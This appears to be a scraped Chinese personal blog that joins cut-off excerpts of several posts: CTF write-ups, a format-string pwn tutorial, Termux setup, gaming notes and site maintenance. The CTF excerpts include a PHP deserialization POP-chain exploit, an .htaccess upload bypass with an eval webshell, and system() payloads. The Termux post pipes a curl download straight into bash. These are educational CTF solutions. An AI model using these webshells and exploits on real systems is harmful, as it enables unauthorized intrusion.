真不戳
W@v3s战队一、战队信息名称:W@v3s排名:9二、解题情况粘贴解题图片三、解题过程Web题目一名称 Checkin直接访问 Burp抓包即可得到flag关键步骤截图题目二名称 pppopPop链的exp:<?php class A1{ public $tmp1; public $tmp2; } class A3{ } class A4{ public $tmp1; } class A6{ public $tmp1; } class A8{ } $a1 = new A1(); $a3 = new A3(); $a4 = new A4(); $a6 = new A6(); $a8 = new A8(); $a1->tmp1=$a3; $a3->tmp2=$a4; $a4->tmp1=$a6; $a6->tmp1=$a8; echo urlencode(serialize($a1));这时候会执行echo new $this->tmp1($this->tmp2);使用GlobIterator匹配通配符读文件f
格式化字符串的一道题,整了一整天才弄明白,问了我哦等我哈了大佬和口那是二进制神。来复现一下这个题目是这样的,看起来是不是很简单,确实,我刚开始学,啥也不是。第一关先康康前面七句 :Coolapk84:这个属于是第一关了,格式化字符串改数值。要利用11行这个把v3改成12。那么咋改呢,利用格式化字符串漏洞,由于这个题目限制输入比较严格,需要打开gdb来调试,看格式化字符串的偏移。据二进制神称,我们需要用gdb把点断在call scanf后面一行,这里可以用disassemble vuln来看汇编:可以看到 0x08048625 <+79>: call 0x8048490 <__isoc99_scanf@plt> 0x0804862a <+84>: add esp,0x10 复制2a这个地址,然后b *0x0804862a就可以断在这里了。然后r一下,随便输点什么让他读进去,回车,就断在这里了然后输入stack 30 看看栈上,你刚刚输入的东西在什么位置这里可以看到是在第0f个,所以偏移就是0f即15了。可以构造一个%15
别嫌我水文章了,我真的不知道发什么这是新站哼哼哼,啊啊啊啊啊啊啊啊啊啊来力(2022.8.1:悲报,域名和服务器都寄了,本站宣布终结
属于是做无用功了,折腾自己 ::(喷) 整了个frp在阿里云轻量服务器上面然后又把网站迁移到新软路由(树莓派)上面了弄了一天才整明白nginx的ssl怎么设置哼哼哼,啊啊啊啊啊啊啊啊啊啊啊
Termux的安装首先是下载Termux最新版,由于项目停止了在Google play store的更新,所以只能去f-droid下载最新版。下载地址:https://f-droid.org/zh_Hans/packages/com.termux/下载完这个之后还要安装一个Termux:api,貌似是用于调用一些手机接口的。下载地址:https://f-droid.org/zh_Hans/packages/com.termux.api/f-droid可能下载有一些慢,建议打开魔法上网工具。正常安装之后,打开Termux,可能会有初始化,如果卡住的话,同样还是开启魔法上网工具即可解决。使用Tmoe-linux项目一键安装容器这里隆重介绍一下这个项目(项目地址:https://gitee.com/mo2/linux),真的是懒人必备,他不仅可以在Termux运行,还可以在WSL上运行,而且用终端模拟出了gui界面,真就一键安装。那么在Termux上该如何使用它呢bash -c "$(curl -fsSL https://gitee.com/mo2/linux/raw/2/2)&q
最近在玩:Terraria(买了几天就肝20个小时的屑就是我吧MC(mc.xunflash.top 客户端下载:https://xzz.xunflash.top/%E6%B8%B8%E6%88%8F/mc1.12.2client.zip摩尔庄园手游(重温经典开始养老了 :Coolapk76:最近在看:饮茶哥(直接当闹钟了肌肉金轮 :Coolapk84: (bushi所以快来加我好友吧Steam代码:1120752455摩尔庄园:XFlash
第一次参加的校赛 :Coolapk46: 要被锤爆了好多大佬噢,还有个没进集训队的巨佬直接冲到第三,tql这里是官方题目和wphttps://github.com/A1natas/zjnuctf-school-contest-2021下面是菜鸡wp请慢用热身网络安全法直接搜网络安全法颁布日期webweb签到Hackbar post system(“cat flag;”)即可easy upload上传.htaccess文件,内容为<FilesMatch "evil.png"> SetHandler application/x-httpd-php </FilesMatch> burp抓包改文件类型为image/jpeg然后上传 evil.png,内容为<?php eval($_POST[pass]);?>蚁剑连接,密码为pass,根目录找到flagmd5Payload:?a1=QNKCDZO&a2=s878926199a&b1[]=111&b2[]=222Post:cmd=system('ca\t<>/fl\ag');
:Coolapk140: 本篇可能会持续更新PART1RE11:Java逆向解密这个是为数不多自己做的题下载来是个.class文件,用jadx打开来是这个样子看到26有一堆奇奇怪怪的,看着就像ascii的东西,有个加密函数那么就写个解密脚本key=[180, 136, 137, 147, 191, 137, 147, 191, 148, 136, 133, 191, 134, 140, 129, 135, 191, 65] flag='' for i in key: s=(i^32)-ord('@') flag+=chr(s) print flag 运行结果:flag:flag{This_is_the_flag_!}RE12:刮开有奖[hidden]不会,还没写呢[/hidden]RE13:[GXYCTF2019]luck_guy21.5.1又被小端序这个东西坑了:在CTF中的小端序与大端序下载文件出来ida64拖进去打开整个反编译出来逻辑还是比较清楚的,就是switch按照一定顺序执行,就会给flag看了一下感觉有用的就1,4,5 想了一下可能会是451,4551
:bilidoge 你可能已经注意到了,评论的时候表情里面多了很多东西 :Coolapk77: :QQ242: :QQ242: :QQ242: 那么究竟是怎么加的呢?小编也很疑惑接下来一起和小编来看看吧抠表情本来是准备直接去网上下载表情包的,但是发现网上的素材都有点老了...所以自己动手丰衣足食,直接参考b站一个视频酷安表情包提取教程然后就顺利的提取出来了酷安的表情包。但是QQ的表情包提取就不太顺利了,刚开始,我也准备解包QQ的apk,但是找到表情包地址之后没用...动图全部是0kb,不知道是不是腾讯加密了。我裂开了然后我就找到了一篇文章获取QQ所有的表情包,包括emoji,动态gifwow,这可真是好东西,找主题群大佬改了一下就提取出来了qq的emoji了,包括最新的(虽然有点模糊)至于小电视的表情包嘛,我直接从翠翠的博客上面下载的 :QQ265:处理图片提取表情出来之后,我才发现,这表情包图片也太大了8,放在网站上面有点影响观感,于是想改成统一的30*30px。于是乎,用ps批处理改好了酷安的表情包但是qq和小电视的就麻烦了,动图貌似不能用ps批处理保存,于是我就想着借鉴(抄
为了熟悉使用GitHub这个玩意,我把我大一短学期作业(c语言) 放上去了(如果以后有人用得到的话就可以拿去抄咯)初学者,就一顿乱写,大佬们就当看个笑话⑧ ::(委屈) 还有一些bug都懒得修了直接交作业了2022.07.23更新:由于现在看来这个代码实在是太丑太烂了,设置私有库了,实在想要的找我侧栏qq拿吧。链接:https://github.com/Xunflash/buslinesystem预览图:(都不敢加到技术标签里面怕被骂
Xunflash